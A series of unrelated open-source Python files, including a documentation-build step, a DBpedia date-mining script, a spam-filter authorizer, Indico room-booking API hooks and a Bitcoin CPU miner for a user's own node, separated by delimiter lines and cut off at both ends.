return command.encode(sys.getfilesystemencoding()) if is_sublime_2_and_in_windows else command
|
#!/usr/bin/env python
# coding: utf-8
from __future__ import print_function
from __future__ import absolute_import
import codecs
import glob
import json
import os
import re
import six
import sys
import tct
from os.path import join as ospj
from tct import deepget
params = tct.readjson(sys.argv[1])
binabspath = sys.argv[2]
facts = tct.readjson(params['factsfile'])
milestones = tct.readjson(params['milestonesfile'])
reason = ''
resultfile = params['resultfile']
result = tct.readjson(resultfile)
loglist = result['loglist'] = result.get('loglist', [])
toolname = params['toolname']
toolname_pure = params['toolname_pure']
workdir = params['workdir']
exitcode = CONTINUE = 0
# ==================================================
# Make a copy of milestones for later inspection?
# --------------------------------------------------
if 0 or milestones.get('debug_always_make_milestones_snapshot'):
tct.make_snapshot_of_milestones(params['milestonesfile'], sys.argv[1])
# ==================================================
# Helper functions
# --------------------------------------------------
def lookup(D, *keys, **kwdargs):
result = deepget(D, *keys, **kwdargs)
loglist.append((keys, result))
return result
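# For example, lookup(milestones, 'build_html_folder') returns the deepget()
# result (or its default) and records (keys, result) in loglist for inspection.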
# ==================================================
# define
# --------------------------------------------------
theme_info = None
theme_info_json_file = None
theme_module_path = None
xeq_name_cnt = 0
# ==================================================
# Check params
# --------------------------------------------------
if exitcode == CONTINUE:
loglist.append('CHECK PARAMS')
build_html_folder = lookup(milestones, 'build_html_folder')
if not (1
and build_html_folder
and 1):
CONTINUE = -2
reason = 'Bad PARAMS or nothing to do'
if exitcode == CONTINUE:
loglist.append('PARAMS are ok')
else:
loglist.append(reason)
# ==================================================
# work
# --------------------------------------------------
if exitcode == CONTINUE:
f1path = os.path.join(build_html_folder, '_static/_version_info_GENERATED.json')
if not os.path.exists(f1path):
CONTINUE = -2
reason = "'_static/_version_info_GENERATED.json' not found"
if exitcode == CONTINUE:
with open(f1path) as f1:
theme_info = json.load(f1)
theme_info_json_file = f1path
theme_module = __import__(theme_info['module_name'])
theme_module_path = ospj(theme_module.get_html_theme_path(), theme_info['module_name'])
# ==================================================
# Set MILESTONE
# --------------------------------------------------
if theme_info:
result['MILESTONES'].append(
{'theme_info': theme_info})
if theme_info_json_file:
result['MILESTONES'].append(
{'theme_info_json_file': theme_info_json_file})
if theme_module_path:
result['MILESTONES'].append(
{'theme_module_path': theme_module_path})
# ==================================================
# save result
# --------------------------------------------------
tct.save_the_result(result, resultfile, params, facts, milestones, exitcode, CONTINUE, reason)
# ==================================================
# Return with proper exitcode
# --------------------------------------------------
sys.exit(exitcode)
|
from subprocess import *
import re
import treetaggerwrapper
import sparqlQuerypy
from bs4 import BeautifulSoup
CONSTANTKEYVERBS="die, died, death, born, birth, sworn in" # Key verbs: keep a sentence only if one of these words is present; these are the events we are interested in.
tagger = treetaggerwrapper.TreeTagger(TAGLANG = 'en', TAGDIR = '/home/vedu29/python/Gsoc/treetagger')
def jarWrapper(*args): # The helper function to use the jar file.
process = Popen(['java', '-jar']+list(args), stdout=PIPE, stderr=PIPE)
ret=[]
while process.poll() is None:
line = process.stdout.readline()
if line != '' and line.endswith('\n'):
ret.append(line[:-1])
stdout, stderr = process.communicate()
ret += stdout.split('\n')
if stderr != '':
ret += stderr.split('\n')
    if '' in ret:
        ret.remove('')
return ret
def returnProperty(word): # Helper function mapping a verb to a property; the mapping stays small given the few date properties in DBpedia.
if word in ['death', 'die']: return 'http://dbpedia.org/ontology/deathDate'
if word in ['birth', 'born', 'bear']: return 'http://dbpedia.org/ontology/birthDate'
def normalizeAnnotations(sentence): # Helper function to remove reference annotations, which appear as square brackets at the end of the sentence.
return re.sub(r'\[[0-9]*\]', ' ', sentence)
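# e.g. normalizeAnnotations('He died in 1990.[3]') -> 'He died in 1990. '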
def sentenceSplitter(sentence): # Helper function using a regular expression to correctly find the ends of sentences.
return re.split(r'(?<!\w\.\w.)(?<![A-Z][a-z]\.)(?<=\.|\?)\s', sentence)
def normaliseResult(result):
normRes=[]
for sentence in result:
sent=normalizeAnnotations(sentence)
normRes += sentenceSplitter(sent)
return normRes
def findAndGenericAnnotateTime(sentence): # Replace HeidelTime TIMEX3 tags with a generic 'TIME' so that TreeTagger can work its magic without hiccups.
return re.sub('<TIMEX3((?!<TIMEX3).)*</TIMEX3>', 'TIME', sentence)
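# e.g. '<TIMEX3 tid="t1" type="DATE" value="1985">1985</TIMEX3>' collapses to 'TIME'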
def treetag(sentence, encoding=None): # TreeTagger helper function.
    if encoding is not None:
return treetaggerwrapper.make_tags(tagger.tag_text(unicode(sentence, "utf-8")))
else:
return treetaggerwrapper.make_tags(tagger.tag_text(sentence))
def returnKeyverbs(): #formats the key verbs above.
return '|'.join(verb for verb in CONSTANTKEYVERBS.split(', '))
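# e.g. returnKeyverbs() -> 'die|died|death|born|birth|sworn in'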
def findSubVerbsTime(tagsentence): # The main helper function that figures out the subject in the sentence and finds the correct core verbs marked by an '*'
pos=[]
pos2=[]
seenSubject=False
seenVerb=False
lastfew=0
for i, tags in enumerate(tagsentence):
if tags.pos=='NP' or tags.pos=='PP':
pos += [tags.word]
seenSubject=True
lastfew+=1
        if re.match(u'V..|V.', tags.pos) is not None and seenSubject:
if not seenVerb:
subject = pos[-lastfew:]
pos2 += [[subject]]
            if re.match(u'VB.', tags.pos) is not None:
pos2[-1] += [tags.word]
else:
pos2[-1] += [tags.word+'*']
seenVerb=True
        if re.match(u'V..|V.', tags.pos) is None and seenVerb:
seenVerb=False
seenSubject=False
lastfew=0
return pos2
def lemmatizeMainVerb(item):
for verb in item[1:]:
if '*' in verb:
return treetag(verb)[0].lemma
def listTimes(sentence): # uses beautiful soup to get the date information.
soup = BeautifulSoup(sentence, 'html.parser')
return soup.find_all('timex3')
def main(args):
result = jarWrapper(*args)
for sentence in normaliseResult(result):
sent=findAndGenericAnnotateTime(sentence)
m = re.match(r"(?P<first_part>.*) (?P<predicate>%s) (?P<second_part>.*)"%(returnKeyverbs()), sent) #scans the sentences for this pattern.
        if m is not None:
left=treetag(m.group('first_part'), "utf-8")
middle=treetag(m.group('predicate'), "utf-8")
right=treetag(m.group('second_part'), "utf-8")
tagsentence = left + middle + right
            if 'TIME' in m.group('first_part') or 'TIME' in m.group('second_part'): # Only proceed when the sentence carries date details.
subVerbTime = findSubVerbsTime(tagsentence)
for item in subVerbTime:
subject=" ".join(thing for thing in item[0])
if subject.lower() in ['he','she', 'it']:
subject=previousSubject
annotate = sparqlQuerypy.findAnnotation(subject)
annotatedSubject = annotate[0]['s']['value']
                    previousSubject = subject # heuristic: the subject of this pronoun is indeed the previous subject (not well thought through!)
verbLemma=lemmatizeMainVerb(item)
                    if verbLemma is not None: prop = returnProperty(verbLemma)
timexList = listTimes(sentence)
                    i = 0
                    while timexList[i]['type'] not in ["DATE", "TIME"]:
                        i += 1
                    time = timexList[i]['value']
date= sparqlQuerypy.findDate(annotatedSubject, prop)
if len(date) != 0:
date= date[0]['z']['value']
print '- - - - - - - - - - - - - - - - \n \n'
print sentence
print ' '
print 'The subject is:', subject
print 'The annotated subject is:', annotatedSubject
print 'The property is:', prop
print 'Date according to dbpedia:', date
print 'Date mined from the text:', time
print '\n \n'
if __name__ == '__main__':
    args = ['de.unihd.dbs.heideltime.standalone.jar', 'input']
    main(args)
|
# -*- coding: utf-8 -*-
#
# SpamFighter, Copyright 2008, 2009 NetStream LLC (http://netstream.ru/, [email protected])
#
# This file is part of SpamFighter.
#
# SpamFighter is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SpamFighter is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SpamFighter. If not, see <http://www.gnu.org/licenses/>.
#
"""
Модуль авторизации партнеров без логинов/паролей (на доверии).
"""
from zope.interface import implements
from twisted.internet import defer
from spamfighter.interfaces import IPartner, IPartnerAuthorizer
from spamfighter.core.partner import PartnerAuthorizationFailedError
from spamfighter.core.domain import getDefaultDomain, BaseDomain
from spamfighter.plugin import loadPlugin, IDefaultDomainProvider
from spamfighter.utils import config
class NullPartner(object):
"""
Партнер, авторизованный без логина/пароля (на доверии).
@ivar domain: корневой домен партнера
@type domain: L{BaseDomain}
"""
implements(IPartner)
def __init__(self):
"""
Конструктор.
"""
domainProvider = loadPlugin(IDefaultDomainProvider, config.plugins.domain.null_partner_domain_provider)
self.domain = domainProvider.getDefaultDomain()
def rootDomain(self):
"""
Получить корневой домен партнера.
@return: Deferred, корневой домен (L{IDomain})
@rtype: C{twisted.internet.defer.Deferred}
"""
return defer.succeed(self.domain)
class NullPartnerAuthorizer(object):
"""
Провайдер авторизации партнеров без логина/пароля (на доверии).
В этой ситуации доступ к СпамоБорцу ограничен с помощью других средств
(HTTP-proxy, firewall).
@ivar partner: единственный партнер, который обеспечивает весь доступ
@type partner: L{NullPartner}
"""
implements(IPartnerAuthorizer)
def __init__(self):
"""
Конструктор.
"""
self.partner = NullPartner()
def authorize(self, partner_info):
"""
Выполнить авторизацию партнера.
@param partner_info: информация о партнере
@return: Deferred, партнер (L{IPartner})
@rtype: C{twisted.internet.defer.Deferred}
"""
if partner_info is not None:
return defer.fail(PartnerAuthorizationFailedError())
return defer.succeed(self.partner)
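# For example: authorize(None) succeeds with the shared NullPartner, while any
# non-None partner_info is rejected with PartnerAuthorizationFailedError.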
|
"""
.. module:: operators.dive_operator
:synopsis: DivePythonOperator for use with TaskRunner
.. moduleauthor:: Laura Lorenz <[email protected]>
.. moduleauthor:: Miriam Sexton <[email protected]>
"""
from airflow.operators import PythonOperator
from .dive_operator import DiveOperator
class DivePythonOperator(DiveOperator, PythonOperator):
"""
Python operator that can send along data dependencies to its callable.
Generates the callable by initializing its python object and calling its method.
"""
def __init__(self, python_object, python_method="run", *args, **kwargs):
self.python_object = python_object
self.python_method = python_method
kwargs['python_callable'] = None
super(DivePythonOperator, self).__init__(*args, **kwargs)
def pre_execute(self, context):
context.update(self.op_kwargs)
context.update({"data_dependencies": self.data_dependencies})
instantiated_object = self.python_object(context)
self.python_callable = getattr(instantiated_object, self.python_method)
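# A minimal usage sketch (MyJob and dag are hypothetical, not part of this module):
#
#   class MyJob(object):
#       def __init__(self, context):
#           self.context = context
#       def run(self):
#           ...  # e.g. use self.context['data_dependencies']
#
#   task = DivePythonOperator(task_id='my_job', python_object=MyJob,
#                             python_method='run', dag=dag)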
|
# -*- coding: utf-8 -*-
##
##
## This file is part of Indico
## Copyright (C) 2002 - 2013 European Organization for Nuclear Research (CERN)
##
## Indico is free software: you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation, either version 3 of the
## License, or (at your option) any later version.
##
## Indico is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Indico. If not, see <http://www.gnu.org/licenses/>.
from datetime import datetime
import icalendar
import pytz
from babel.dates import get_timezone
from sqlalchemy import Time, Date
from sqlalchemy.sql import cast
from werkzeug.datastructures import OrderedMultiDict, MultiDict
from indico.core.config import Config
from indico.core.db import db
from indico.core.errors import IndicoError
from indico.modules.rb.utils import rb_check_user_access
from indico.modules.rb.models.reservations import Reservation, RepeatMapping, RepeatFrequency, ConflictingOccurrences
from indico.modules.rb.models.locations import Location
from indico.modules.rb.models.rooms import Room
from indico.util.date_time import utc_to_server
from indico.web.http_api import HTTPAPIHook
from indico.web.http_api.metadata import ical
from indico.web.http_api.responses import HTTPAPIError
from indico.web.http_api.util import get_query_parameter
from MaKaC.authentication import AuthenticatorMgr
from MaKaC.common.info import HelperMaKaCInfo
class RoomBookingHookBase(HTTPAPIHook):
GUEST_ALLOWED = False
def _getParams(self):
super(RoomBookingHookBase, self)._getParams()
self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None
self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None
self._occurrences = _yesno(get_query_parameter(self._queryParams, ['occ', 'occurrences'], 'no'))
def _hasAccess(self, aw):
return Config.getInstance().getIsRoomBookingActive() and rb_check_user_access(aw.getUser())
@HTTPAPIHook.register
class RoomHook(RoomBookingHookBase):
# e.g. /export/room/CERN/23.json
TYPES = ('room',)
RE = r'(?P<location>[\w\s]+)/(?P<idlist>\w+(?:-[\w\s]+)*)'
DEFAULT_DETAIL = 'rooms'
MAX_RECORDS = {
'rooms': 500,
'reservations': 100
}
VALID_FORMATS = ('json', 'jsonp', 'xml')
def _getParams(self):
super(RoomHook, self)._getParams()
self._location = self._pathParams['location']
self._ids = map(int, self._pathParams['idlist'].split('-'))
if self._detail not in {'rooms', 'reservations'}:
raise HTTPAPIError('Invalid detail level: %s' % self._detail, 400)
def export_room(self, aw):
loc = Location.find_first(name=self._location)
if loc is None:
return
# Retrieve rooms
rooms_data = list(Room.get_with_data('vc_equipment', 'non_vc_equipment',
filters=[Room.id.in_(self._ids), Room.location_id == loc.id]))
# Retrieve reservations
reservations = None
if self._detail == 'reservations':
reservations = OrderedMultiDict(_export_reservations(self, True, False, [
Reservation.room_id.in_(x['room'].id for x in rooms_data)
]))
for result in rooms_data:
yield _serializable_room(result, reservations)
@HTTPAPIHook.register
class RoomNameHook(RoomBookingHookBase):
# e.g. /export/roomName/CERN/pump.json
GUEST_ALLOWED = True
TYPES = ('roomName', )
RE = r'(?P<location>[\w\s]+)/(?P<room_name>[\w\s\-]+)'
DEFAULT_DETAIL = 'rooms'
MAX_RECORDS = {
'rooms': 500
}
VALID_FORMATS = ('json', 'jsonp', 'xml')
def _getParams(self):
super(RoomNameHook, self)._getParams()
self._location = self._pathParams['location']
self._room_name = self._pathParams['room_name']
def _hasAccess(self, aw):
# Access to RB data (no reservations) is public
return Config.getInstance().getIsRoomBookingActive()
def export_roomName(self, aw):
loc = Location.find_first(name=self._location)
if loc is None:
return
search_str = '%{}%'.format(self._room_name)
rooms_data = Room.get_with_data('vc_equipment', 'non_vc_equipment',
filters=[Room.location_id == loc.id, Room.name.ilike(search_str)])
for result in rooms_data:
yield _serializable_room(result)
@HTTPAPIHook.register
class ReservationHook(RoomBookingHookBase):
# e.g. /export/reservation/CERN.json
TYPES = ('reservation', )
RE = r'(?P<loclist>[\w\s]+(?:-[\w\s]+)*)'
DEFAULT_DETAIL = 'reservations'
MAX_RECORDS = {
'reservations': 100
}
VALID_FORMATS = ('json', 'jsonp', 'xml', 'ics')
@property
def serializer_args(self):
return {'ical_serializer': _ical_serialize_reservation}
def _getParams(self):
super(ReservationHook, self)._getParams()
self._locations = self._pathParams['loclist'].split('-')
def export_reservation(self, aw):
locations = Location.find_all(Location.name.in_(self._locations))
if not locations:
return
for room_id, reservation in _export_reservations(self, False, True):
yield reservation
@HTTPAPIHook.register
class BookRoomHook(HTTPAPIHook):
PREFIX = 'api'
TYPES = ('roomBooking',)
RE = r'bookRoom'
GUEST_ALLOWED = False
VALID_FORMATS = ('json', 'xml')
COMMIT = True
HTTP_POST = True
def _getParams(self):
super(BookRoomHook, self)._getParams()
self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None
self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None
if not self._fromDT or not self._toDT or self._fromDT.date() != self._toDT.date():
raise HTTPAPIError('from/to must be on the same day')
elif self._fromDT >= self._toDT:
raise HTTPAPIError('to must be after from')
elif self._fromDT < datetime.now():
raise HTTPAPIError('You cannot make bookings in the past')
username = get_query_parameter(self._queryParams, 'username')
avatars = username and filter(None, AuthenticatorMgr().getAvatarByLogin(username).itervalues())
if not avatars:
raise HTTPAPIError('Username does not exist')
elif len(avatars) != 1:
raise HTTPAPIError('Ambiguous username ({} users found)'.format(len(avatars)))
avatar = avatars[0]
self._params = {
'room_id': get_query_parameter(self._queryParams, 'roomid'),
'reason': get_query_parameter(self._queryParams, 'reason'),
'booked_for': avatar,
'from': self._fromDT,
'to': self._toDT
}
missing = [key for key, val in self._params.iteritems() if not val]
if missing:
raise HTTPAPIError('Required params missing: {}'.format(', '.join(missing)))
self._room = Room.get(self._params['room_id'])
if not self._room:
raise HTTPAPIError('A room with this ID does not exist')
def _hasAccess(self, aw):
if not Config.getInstance().getIsRoomBookingActive() or not rb_check_user_access(aw.getUser()):
return False
if self._room.can_be_booked(aw.getUser()):
return True
elif self._room.can_be_prebooked(aw.getUser()):
raise HTTPAPIError('The API only supports direct bookings but this room only allows pre-bookings.')
return False
def api_roomBooking(self, aw):
data = MultiDict({
'start_dt': self._params['from'],
'end_dt': self._params['to'],
'repeat_frequency': RepeatFrequency.NEVER,
'repeat_interval': 0,
'room_id': self._room.id,
'booked_for_id': self._params['booked_for'].getId(),
'contact_email': self._params['booked_for'].getEmail(),
'contact_phone': self._params['booked_for'].getTelephone(),
'booking_reason': self._params['reason']
})
try:
reservation = Reservation.create_from_data(self._room, data, aw.getUser())
except ConflictingOccurrences:
raise HTTPAPIError('Failed to create the booking due to conflicts with other bookings')
except IndicoError as e:
raise HTTPAPIError('Failed to create the booking: {}'.format(e))
db.session.add(reservation)
db.session.flush()
return {'reservationID': reservation.id}
def _export_reservations(hook, limit_per_room, include_rooms, extra_filters=None):
"""Exports reservations.
:param hook: The HTTPAPIHook instance
:param limit_per_room: Should the limit/offset be applied per room
:param include_rooms: Should reservations include room information
"""
filters = list(extra_filters) if extra_filters else []
if hook._fromDT and hook._toDT:
filters.append(cast(Reservation.start_dt, Date) <= hook._toDT.date())
filters.append(cast(Reservation.end_dt, Date) >= hook._fromDT.date())
filters.append(cast(Reservation.start_dt, Time) <= hook._toDT.time())
filters.append(cast(Reservation.end_dt, Time) >= hook._fromDT.time())
elif hook._toDT:
filters.append(cast(Reservation.end_dt, Date) <= hook._toDT.date())
filters.append(cast(Reservation.end_dt, Time) <= hook._toDT.time())
elif hook._fromDT:
filters.append(cast(Reservation.start_dt, Date) >= hook._fromDT.date())
filters.append(cast(Reservation.start_dt, Time) >= hook._fromDT.time())
filters += _get_reservation_state_filter(hook._queryParams)
occurs = [datetime.strptime(x, '%Y-%m-%d').date()
for x in filter(None, get_query_parameter(hook._queryParams, ['occurs'], '').split(','))]
data = ['vc_equipment']
if hook._occurrences:
data.append('occurrences')
order = {
'start': Reservation.start_dt,
'end': Reservation.end_dt
}.get(hook._orderBy, Reservation.start_dt)
if hook._descending:
order = order.desc()
reservations_data = Reservation.get_with_data(*data, filters=filters, limit=hook._limit, offset=hook._offset,
order=order, limit_per_room=limit_per_room, occurs_on=occurs)
for result in reservations_data:
yield result['reservation'].room_id, _serializable_reservation(result, include_rooms)
def _serializable_room(room_data, reservations=None):
"""Serializable room data
:param room_data: Room data
:param reservations: MultiDict mapping for room id => reservations
"""
data = room_data['room'].to_serializable('__api_public__')
data['_type'] = 'Room'
data['avc'] = bool(room_data['vc_equipment'])
data['vcList'] = room_data['vc_equipment']
data['equipment'] = room_data['non_vc_equipment']
if reservations is not None:
data['reservations'] = reservations.getlist(room_data['room'].id)
return data
def _serializable_room_minimal(room):
"""Serializable minimal room data (inside reservations)
:param room: A `Room`
"""
data = room.to_serializable('__api_minimal_public__')
data['_type'] = 'Room'
return data
def _serializable_reservation(reservation_data, include_room=False):
"""Serializable reservation (standalone or inside room)
:param reservation_data: Reservation data
:param include_room: Include minimal room information
"""
reservation = reservation_data['reservation']
data = reservation.to_serializable('__api_public__', converters={datetime: _add_server_tz})
data['_type'] = 'Reservation'
data['repeatability'] = None
if reservation.repeat_frequency:
data['repeatability'] = RepeatMapping.get_short_name(*reservation.repetition)
data['vcList'] = reservation_data['vc_equipment']
if include_room:
data['room'] = _serializable_room_minimal(reservation_data['reservation'].room)
if 'occurrences' in reservation_data:
data['occurrences'] = [o.to_serializable('__api_public__', converters={datetime: _add_server_tz})
for o in reservation_data['occurrences']]
return data
def _ical_serialize_repeatability(data):
start_dt_utc = data['startDT'].astimezone(pytz.utc)
end_dt_utc = data['endDT'].astimezone(pytz.utc)
WEEK_DAYS = 'MO TU WE TH FR SA SU'.split()
recur = ical.vRecur()
recur['until'] = end_dt_utc
if data['repeat_frequency'] == RepeatFrequency.DAY:
recur['freq'] = 'daily'
elif data['repeat_frequency'] == RepeatFrequency.WEEK:
recur['freq'] = 'weekly'
recur['interval'] = data['repeat_interval']
elif data['repeat_frequency'] == RepeatFrequency.MONTH:
recur['freq'] = 'monthly'
recur['byday'] = '{}{}'.format(start_dt_utc.day // 7, WEEK_DAYS[start_dt_utc.weekday()])
return recur
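# e.g. a monthly reservation starting on Tuesday the 15th serializes here as
# byday '2TU' (15 // 7 == 2, weekday index 1 -> 'TU').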
def _ical_serialize_reservation(cal, data, now):
start_dt_utc = data['startDT'].astimezone(pytz.utc)
end_dt_utc = datetime.combine(data['startDT'].date(), data['endDT'].timetz()).astimezone(pytz.utc)
event = icalendar.Event()
event.add('uid', 'indico-resv-%[email protected]' % data['id'])
event.add('dtstamp', now)
event.add('dtstart', start_dt_utc)
event.add('dtend', end_dt_utc)
event.add('url', data['bookingUrl'])
event.add('summary', data['reason'])
event.add('location', u'{}: {}'.format(data['location'], data['room']['fullName']))
event.add('description', data['reason'].decode('utf-8') + '\n\n' + data['bookingUrl'])
if data['repeat_frequency'] != RepeatFrequency.NEVER:
event.add('rrule', _ical_serialize_repeatability(data))
cal.add_component(event)
def _add_server_tz(dt):
if dt.tzinfo is None:
return dt.replace(tzinfo=get_timezone(HelperMaKaCInfo.getMaKaCInfoInstance().getTimezone()))
return dt
def _yesno(value):
return value.lower() in {'yes', 'y', '1', 'true'}
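# e.g. _yesno('Yes') -> True, _yesno('0') -> False; anything outside the set is False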
def _get_reservation_state_filter(params):
cancelled = get_query_parameter(params, ['cxl', 'cancelled'])
rejected = get_query_parameter(params, ['rej', 'rejected'])
confirmed = get_query_parameter(params, ['confirmed'])
archived = get_query_parameter(params, ['arch', 'archived', 'archival'])
repeating = get_query_parameter(params, ['rec', 'recurring', 'rep', 'repeating'])
avc = get_query_parameter(params, ['avc'])
avc_support = get_query_parameter(params, ['avcs', 'avcsupport'])
startup_support = get_query_parameter(params, ['sts', 'startupsupport'])
booked_for = get_query_parameter(params, ['bf', 'bookedfor'])
filters = []
if cancelled is not None:
filters.append(Reservation.is_cancelled == _yesno(cancelled))
if rejected is not None:
filters.append(Reservation.is_rejected == _yesno(rejected))
if confirmed is not None:
if confirmed == 'pending':
filters.append(Reservation.is_pending)
elif _yesno(confirmed):
filters.append(Reservation.is_accepted)
else:
filters.append(~Reservation.is_accepted)
filters.append(Reservation.is_rejected | Reservation.is_cancelled)
if archived is not None:
filters.append(Reservation.is_archived == _yesno(archived))
if repeating is not None:
if _yesno(repeating):
filters.append(Reservation.repeat_frequency != 0)
else:
filters.append(Reservation.repeat_frequency == 0)
if avc is not None:
filters.append(Reservation.uses_vc == _yesno(avc))
if avc_support is not None:
filters.append(Reservation.needs_vc_assistance == _yesno(avc_support))
if startup_support is not None:
filters.append(Reservation.needs_assistance == _yesno(startup_support))
if booked_for:
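        # '?' and '*' wildcards from the query map to SQL LIKE '_' and '%',
        # e.g. booked_for='j*n?' becomes the LIKE pattern '%j%n_%'.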
like_str = '%{}%'.format(booked_for.replace('?', '_').replace('*', '%'))
filters.append(Reservation.booked_for_name.ilike(like_str))
return filters
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
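# Quick sanity examples for the helpers above (assuming a little-endian host):
#   bytereverse(0x12345678)                         == 0x78563412
#   bufreverse('\x01\x02\x03\x04\x05\x06\x07\x08')  == '\x04\x03\x02\x01\x08\x07\x06\x05'
#   wordreverse('\x01\x02\x03\x04\x05\x06\x07\x08') == '\x05\x06\x07\x08\x01\x02\x03\x04'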
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
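        # The 80-byte block header occupies the first 160 hex chars of the
        # getwork 'data' field; the 4-byte nonce is its last field, i.e. hex
        # chars 152..160, which is where the candidate nonce is spliced in.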
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 9131
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
# Copyright 2016 Tesora, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
